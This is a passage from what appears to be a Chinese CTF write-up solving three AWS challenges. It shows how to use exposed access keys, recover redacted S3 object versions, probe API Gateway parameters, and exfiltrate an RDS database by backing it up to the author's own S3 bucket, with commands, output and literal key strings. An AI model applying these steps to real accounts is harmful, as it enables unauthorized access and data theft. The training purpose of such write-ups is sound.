0x00 来自Infiltrate 2019隐藏关卡的题
首先来到Greetings from the AWS Infiltrate Booth! 看说明,提示第三个Challenge是隐藏的
Third challenge is..somewhere? Around here? Elsewhere? Who knows.
看源码找线索
$ curl http://infiltrate.s3-website-us-east-1.amazonaws.com/
在HTML的末尾看到一些AJAX请求
<script> function g(text) {document.getElementById("heading").innerHTML="<h1>"+text+"</h1>";} var awsimage=document.getElementById("AwsImage"); var xhr=new XMLHttpRequest(); // Promises, yo! Learn to use Promises! xhr.onreadystatechange=function() { if (this.readyState==4 && this.status==200){ var results=JSON.parse(this.responseText); awsimage.src="https://"+results["bucket"]+"/img/"+results["image"]; } }; xhr.open("GET", "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1", true); xhr.send(); g("Welcome!"); </script>
使用curl 请求下,发现返回了AWS Access Key ID 和 AWS Secret Access Key
$ curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1" |jq .
{ "field2": "5/S8sTjlK2R6rIPvyhVl8GdTGEAceii52dN7cBnl", "image": "aws_1.png", "field1": "AKIAYOLTDOPA46OXMUO2", "bucket": "s3-us-west-2.amazonaws.com/c9092b7e-b87e-4aa8-ba59-67664c2133b1" }
region可以通过dig cxwudbwxhc.execute-api.us-west-2.amazonaws.com
得知是us-west-2, 有了这些信息后,本地就可以配置下awscli了.
$ aws configure --profile infiltrate2019 AWS Access Key ID [****************MUO2]: AWS Secret Access Key [****************cBnl]: Default region name [us-west-2]:
通过查看S3,发现f6f61719-4736-4421-9775-ce7651ab25e2桶下有个backup.tgz和notes.txt文件。把这些下回到本地。
$ aws s3 sync s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/ . --profile infiltrate2019 download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/notes.txt to ./notes.txt download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/backup.tgz to ./backup.tgz
Notes.txt文件里没有什么有意义的,解压backup.tgz后,发现有个saved_message.eml,使用outlook直接查看,是个空邮件,感觉有蹊跷,命令行下用cat查看
$ tar zxvf backup.tgz x aws_1.png x aws_2.png x aws_3.png x aws_4.png x aws_5.png x aws_6.png x aws_7.png x saved_message.eml $ cat saved_message.eml From: Alice <[email protected]> To: <[email protected]> Message-ID: <[email protected]> Subject: Really necessary?? MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_85228_1905676953.1554775383225" iSightTracking: 6f0c16a3-032f-42eb-8741-68486d97ffcd Date: Tue, 4 Apr 2017 02:03:03 +0000 X-EOPAttributedMessage: 0 Hey, Bob! I'm still not sure that API is a good idea. You included all of those function() functions to do useful things but I'm still thinking that cowsay() was a bad move. Yes...I know that a bad guy would need to add "cowsays=moo" for it to do anything but I think we should be *more* security-conscious. ~ Alice P.S. Maybe unicornsay()? I like unicorns.
根据saved_message.eml里的提示,替换function和参数访问API gateway, 又返回了另一个s3 bucket
curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=cowsay&cowsays=moo" "/n< s3://83d9a67f-0e37-499b-b7ba-abd50bd82307 >/n // ^__^/n // (oo)//_______/n (__)// )/// ||----w |/n || ||/n"
名为83d9a67f-0e37-499b-b7ba-abd50bd82307的bucket下只有一个instructions.txt文件,本地查看发现该文件的敏感内容都被REDACTED掉了
$ aws s3 sync s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/ . --profile infiltrate2019 download: s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/instructions.txt to ./instructions.txt $ cat instructions.txt Alice, I stashed the goodies where you can find them! ;) <REDACTED> <REDACTED> P.S. I'm sorry. The IT nerds told me to redact the above material. Apparently, it's a "security issue". :(
查看该bucket是否开启了versions功能,如果开启了,可以找回REDACTED前的版本.
$ aws s3api list-object-versions --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --profile infiltrate2019 { "Versions": [ { "LastModified": "2019-04-15T23:13:48.000Z", "VersionId": "Biu1AbfSB8uE01qH1qzX0ECrv3apXCO_", "ETag": "/"2afaecf2c80d67e1c0d1b0436836f21f/"", "StorageClass": "STANDARD", "Key": "instructions.txt", "IsLatest": true, "Size": 193 }, { "LastModified": "2019-04-15T23:11:38.000Z", "VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf", "ETag": "/"a7835a12dd31c1efaaca1dbd5cbaa2c5/"", "StorageClass": "STANDARD", "Key": "instructions.txt", "IsLatest": false, "Size": 108 } ] }
可以看到是有开启versions功能的,下载最早的instructions.txt回本地
$ aws s3api get-object --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --key "instructions.txt" ori-instructions.txt --version-id htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf --profile infiltrate2019 { "AcceptRanges": "bytes", "ContentType": "text/plain", "LastModified": "Mon, 15 Apr 2019 23:11:38 GMT", "ContentLength": 108, "VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf", "ETag": "/"a7835a12dd31c1efaaca1dbd5cbaa2c5/"", "Metadata": {} } $ cat ori-instructions.txt Alice, I stashed the goodies where you can find them! ;) function=ScumAndVillainy MosEisley=<anything>
读取ori-instructions.txt后,根据提示,改变function来访问API gateway,得到最终的flag
$ curl "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=ScumAndVillainy&MosEisley=moo" -s | jq . "flag{33e842a3-eaea-4b1e-8637-5cf6c686e0de}"
0x01 来自某CTF一道关于API gateway的题
挑战的描述很简单。获取邀请码,注册网站
还是先看搭建在S3 bucket上的静态HTML源码,就是一个包含登录和注册功能的页面。在HTML源码里发现AJAX请求到API gateway 以及一段被注释掉的HTML代码,根据alert判断,可以根据报错信息得到一些提示。
curl -s http://chanllenge1.s3-website-us-west-1.amazonaws.com/ <script type="text/javascript"> $(document).ready(function() { $("#submit").click(function(e) { e.preventDefault(); $.ajax({ type: "GET", dataType: 'json', crossDomain: true, contentType: "text/plain; charset=utf-8", url: 'https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/login?rolename=signin&extId=7369676E696E', success: function(res){ }, error:function(xhr, ajaxOptions, thrownError){ alert('Lambda returned error/n/n remember, error are very useful!'); } }); }) }); </script> <!-- need to remove after testing: http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html -->
根据API Gateway的报错信息,可以得知,如果要获取到邀请码,需要rolename和extId, rolename根据路径信息和报错信息,推测应该就是invite了
curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/ |jq . {"errorMessage": "'rolename'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_funcHon.py", 11, "lambda_handler", "rolename = str(event['query']['rolename'])"]]} curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite {"errorMessage": "'extId'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_funcHon.py", 12, "lambda_handler", "extId = str(event['query']['extId'])"]]}
exitId是啥呢?接着访问 http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html, 发现返回如下文本信息
Operation Type Condition required?
signup signup user 7369676e757075736572
signin signin from admin pool 7369676e696e61646d696e
invite invite ? ?
使用burpsuite的“smart decode”功能尝试自动解码,最终发现
7369676e757075736572 通过ASCII HEX解码为signupuser
7369676e696e61646d696e 通过ASCII HEX解码为signinadmin
尝试把invite用ASCII HEX编码为,然后作为extID请求,获得最终的Flag
curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite&extId=696e76697465 | jq . "CongratulaHons! flag is : CTF{1234_6666_2234_9999_0101} "
0x02 来自某CTF一道关于RDS的题
这个挑战直接给了一个软件调试的LOGS文件,通过LOGs文件可以发现MSSQL数据库的账号和位于us-west-1.rds.amazonaws.com.的主机名
使用Navicat去链接RDS, 查看RDS版本信息,可浏览的数据库,表。
SELECT @@version Microsoft SQL Server 2017 - 14.0.3035.2 (X64) SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘flag’); flag_id
可以看到flag表里的flag_id列因该就是包含我们flag的地方了,直接用Navicat浏览,提示没有查看权限。尝试看看有没有备份权限,如果有备份权限,直接将该数据库备份到S3,然后再本地还原。
先在自己的S3里新建一个public权限的S3 bucket,我这里叫sqlbackup,然后回到Navicat控制台,执行如下命令:
exec msdb.dbo.rds_backup_database @source_db_name=‘secrets’, @s3_arn_to_backup_to=‘arn:aws:s3:::sqlbackup/sql.bak’, @overwrite_S3_backup_file=1, @type=‘FULL’;
执行成功了,说明有backup的权限, 依赖于数据库大小,备份时间长短不一,用如下命令可以查看进度
exec msdb.dbo.rds_task_status @db_name=‘secrets’; 8 BACKUP_DB secrets 100 2 SUCCESS [2019-03-11 13:25:22.013] Task execution has started. [2019-03-11 13:25:22.110] 6 percent processed. [2019-03-11 13:25:22.123] Processed 384 pages for database ‘wwi-secrets’, file ‘secrets’ on file 1. [2019-03-11 13:25:22.140] 100 percent processed. [2019-03-11 13:25:22.140] BACKUP DATABASE successfully processed 386 pages in 0.009 seconds (334.255 MB/sec). [2019-03-11 13:26:22.013] sql.bak: Completing S3 upload, waiting for S3 workers to clean up and exit [2019-03-11 13:26:22.183] sql.bak: Completed processing 100% of S3 chunks. [2019-03-11 13:26:22.357] sql.bak: Final chunk written to S3 successfully. [2019-03-11 13:26:22.360] sql.bak: S3 processing completed successfully [2019-03-11 13:26:22.360] Command execution completed successfully. 2019-03-11 13:26:22.360 2019-03-11 13:24:26.526 arn:aws:s3::: sqlbackup/sql.bak 1
然后本地使用SQL管理器恢复sql.bak文件,就可以看到flag了
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论